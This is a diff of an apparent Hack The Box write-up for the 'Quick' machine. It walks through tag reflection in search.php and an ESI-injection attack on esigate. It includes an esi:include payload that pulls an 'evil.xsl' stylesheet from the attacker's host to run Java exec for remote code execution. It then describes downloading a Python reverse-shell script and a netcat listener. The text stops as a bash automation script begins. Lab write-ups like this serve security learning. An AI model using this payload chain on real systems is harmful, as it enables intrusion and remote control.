zoeyg/public-write-ups/hack-the-box/quick.md

 #### search.php

 Given a ticket ID we can search with the ticket id as part of the url parameter.
 Seems to allow all kinds of tags and XSS but can't seem to make any request hit my server.
-However, if
+However, we know from our previous research that if we can reflect a tag, we can exploit esigate.

 #### esigate

-Now that we have the ability to reflect tags, we can take advantage of the vulnerability in esigate(https://www.gosecure.net/blog/2019/05/02/esi-injection-part-2-abusing-specific-implementations/).
-We need to sign in, run our local server to serve up the
-`evil.xsl` file, and submit this payload:
+Now to take advantage of the vulnerability in esigate(https://www.gosecure.net/blog/2019/05/02/esi-injection-part-2-abusing-specific-implementations/).
+There's a number of moving parts here.
+First we need to sign in, run our local server to serve up the `evil.xsl` file, and submit this payload as a ticket description:

 ```xml
 <esi:include src="http://127.0.0.1:9001/index.php" stylesheet="http://10.10.14.39.com/quick/evil.xsl">
 </esi:include>
 ```

-Then we need to make the request to search.php with the appropriate TKT number.
+Then we need to make the request to `search.php` with the appropriate TKT number so that esigate processes the reflected tags.
 This initiates the request to our local server, which serves the `evil.xsl`, which makes the call to java's exec, giving us RCE.
-Once we have RCE, we can try netcat but it doesn't seem the `-e` switch works.
-So lets upload/download a python script for a reverse shell, and then run it.
+Once we have RCE, we can try netcat but it doesn't seem the `-e` switch works?
+I was unable to get the python reverse shell to run directly(probably some encoding thing), so lets upload/download a python script and then run it.
 Don't forget to setup the netcat listener, and be running a local server to serve the `evil.xsl` file and the python reverse shell.
 This script will automate most of the process, but you may need to alter the paths to get it to work.

 ```bash
 #!/bin/sh